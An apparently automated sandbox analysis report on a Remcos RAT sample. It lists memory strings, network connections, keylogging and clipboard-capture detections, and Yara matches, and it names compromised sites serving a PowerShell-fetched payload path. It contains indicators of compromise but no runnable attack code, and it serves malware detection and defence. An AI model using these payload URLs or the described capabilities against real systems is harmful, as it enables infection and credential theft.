Source: bhvF6CA.tmp.4.dr String found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
Source: bhvF6CA.tmp.4.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhvF6CA.tmp.4.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: bhvF6CA.tmp.4.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: bhvF6CA.tmp.4.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhvF6CA.tmp.4.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhvF6CA.tmp.4.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhvF6CA.tmp.4.dr String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: bhvF6CA.tmp.4.dr String found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
Source: wscript.exe, 00000003.00000002.2188017878.000000000345D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2183776181.0000000003450000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: 77EC63BDA74BD0D0E0426DC8F80085060.3.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000003.00000003.2167892125.0000000005CFD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?378b40adf3637
Source: wscript.exe, 00000003.00000002.2188017878.000000000345D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2183776181.0000000003450000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabxn
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2139093397.0000000000782000.00000004.00000020.00020000.00000000.sdmp, bhvF6CA.tmp.4.dr String found in binary or memory: http://geoplugin.net/json.gp
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe String found in binary or memory: http://geoplugin.net/json.gp/C
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2139093397.000000000076F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpRN
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2139093397.0000000000782000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gplA
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2139093397.000000000076F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpp
Source: powershell.exe, 00000007.00000002.4562647784.0000000005207000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: bhvF6CA.tmp.4.dr String found in binary or memory: http://ocsp.digicert.com0
Source: bhvF6CA.tmp.4.dr String found in binary or memory: http://ocsp.digicert.com0:
Source: bhvF6CA.tmp.4.dr String found in binary or memory: http://ocsp.digicert.com0H
Source: bhvF6CA.tmp.4.dr String found in binary or memory: http://ocsp.digicert.com0I
Source: bhvF6CA.tmp.4.dr String found in binary or memory: http://ocsp.digicert.com0Q
Source: bhvF6CA.tmp.4.dr String found in binary or memory: http://ocsp.msocsp.com0
Source: bhvF6CA.tmp.4.dr String found in binary or memory: http://ocsp.msocsp.com0S
Source: powershell.exe, 00000007.00000002.4555869381.00000000042F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000007.00000002.4555869381.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.4555101569.0000000004C91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.4555869381.00000000042F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: bhvF6CA.tmp.4.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: bhvF6CA.tmp.4.dr String found in binary or memory: http://www.digicert.com/CPS0~
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000002.2174707883.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000003.2174423035.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000003.2174273348.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000002.2174707883.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.com
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4555963712.0000000003810000.00000040.10000000.00040000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000002.2174707883.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000003.2174423035.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000003.2174273348.00000000005CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.compData
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4555963712.0000000003810000.00000040.10000000.00040000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000002.2174707883.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000004.00000002.2197446260.0000000000193000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000002.2174707883.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
Source: powershell.exe, 00000007.00000002.4555869381.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.4555101569.0000000004C91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: powershell.exe, 00000007.00000002.4555869381.0000000004538000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4555869381.000000000448F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.w.org/
Source: powershell.exe, 00000007.00000002.4555869381.00000000042F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://asociatiatraditiimaria.ro
Source: powershell.exe, 00000007.00000002.4562647784.000000000534C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4562647784.00000000051A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://asociatiatraditiimaria.ro/comments/feed/
Source: powershell.exe, 00000007.00000002.4562647784.000000000534C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4562647784.00000000051A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://asociatiatraditiimaria.ro/feed/
Source: powershell.exe, 00000007.00000002.4555869381.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.4555101569.0000000004DE9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://asociatiatraditiimaria.ro/os/transportment.pfm
Source: powershell.exe, 00000007.00000002.4562647784.000000000534C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4562647784.00000000051A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://asociatiatraditiimaria.ro/wp-content/plugins/elementor/assets/css/frontend-lite.min.css?ver=
Source: powershell.exe, 00000007.00000002.4562647784.000000000534C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4562647784.00000000051A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://asociatiatraditiimaria.ro/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.7.2
Source: powershell.exe, 00000007.00000002.4562647784.000000000534C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4562647784.00000000051A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://asociatiatraditiimaria.ro/wp-content/uploads/elementor/css/post-2731.css?ver=1720763767
Source: powershell.exe, 00000007.00000002.4562647784.000000000534C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4562647784.00000000051A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://asociatiatraditiimaria.ro/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1
Source: powershell.exe, 00000007.00000002.4555869381.0000000004538000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4555869381.000000000448F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://asociatiatraditiimaria.ro/wp-json/
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
Source: powershell.exe, 00000007.00000002.4562647784.0000000005207000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.4562647784.0000000005207000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.4562647784.0000000005207000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
Source: powershell.exe, 00000007.00000002.4562647784.000000000534C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4562647784.00000000051A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Nunito
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?0684adfa5500b3bab63593997d26215c
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?79b1312614e5ac304828ba5e1fdb4fa3
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?7ae939fc98ce1346dd2e496abdba2d3b
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?9f3db9405f1b2793ad8d8de9770248e4
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?4aec53910de6415b25f2c4faf3f7e54a
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?77290711a5e44a163ac2e666ad7b53fd
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
Source: powershell.exe, 00000007.00000002.4555869381.00000000042F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000007.00000002.4562647784.000000000534C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4562647784.00000000051A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gmpg.org/xfn/11
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
Source: powershell.exe, 00000007.00000002.4555869381.0000000004538000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://new.quranushaiqer.org.sa
Source: powershell.exe, 00000007.00000002.4555869381.00000000042F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm0
Source: powershell.exe, 0000000B.00000002.4555101569.0000000004DE9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfml
Source: powershell.exe, 00000007.00000002.4562647784.0000000005207000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-30-24/PreSignInSettingsConfig.json?One
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-40-12/PreSignInSettingsConfig.json
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=14d1c105224b3e736c3c
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=7fe112
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000006.00000002.2174707883.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhvF6CA.tmp.4.dr String found in binary or memory: https://www.office.com/
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown HTTPS traffic detected: 93.113.54.56:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.166.62.190:443 -> 192.168.2.6:49723 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to register a low level keyboard hook
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,00000000 0_2_0040A2B8
Installs a global keyboard hook
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Jump to behavior
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard, 0_2_0040B70E
Contains functionality to modify clipboard data
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 0_2_004168C1
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 4_2_0040987A
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 4_2_004098E2
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 5_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 5_2_00406DFC
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 5_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 5_2_00406E9F
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 6_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 6_2_004068B5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 6_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 6_2_004072B5
Contains functionality to read the clipboard data
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard, 0_2_0040B70E
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx, 0_2_0040A3E0

E-Banking Fraud
barindex
Yara detected Remcos RAT
Source: Yara match File source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, type: SAMPLE
Source: Yara match File source: 0.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.2093024228.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4549696326.000000000072E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2171694344.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.2170895717.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.2172358054.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 4368, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3744, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3792, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3504, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands
barindex
Contains functionalty to change the wallpaper
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0041C9E2 SystemParametersInfoW, 0_2_0041C9E2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, type: SAMPLE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, type: SAMPLE Matched rule: REMCOS_RAT_variants Author: unknown
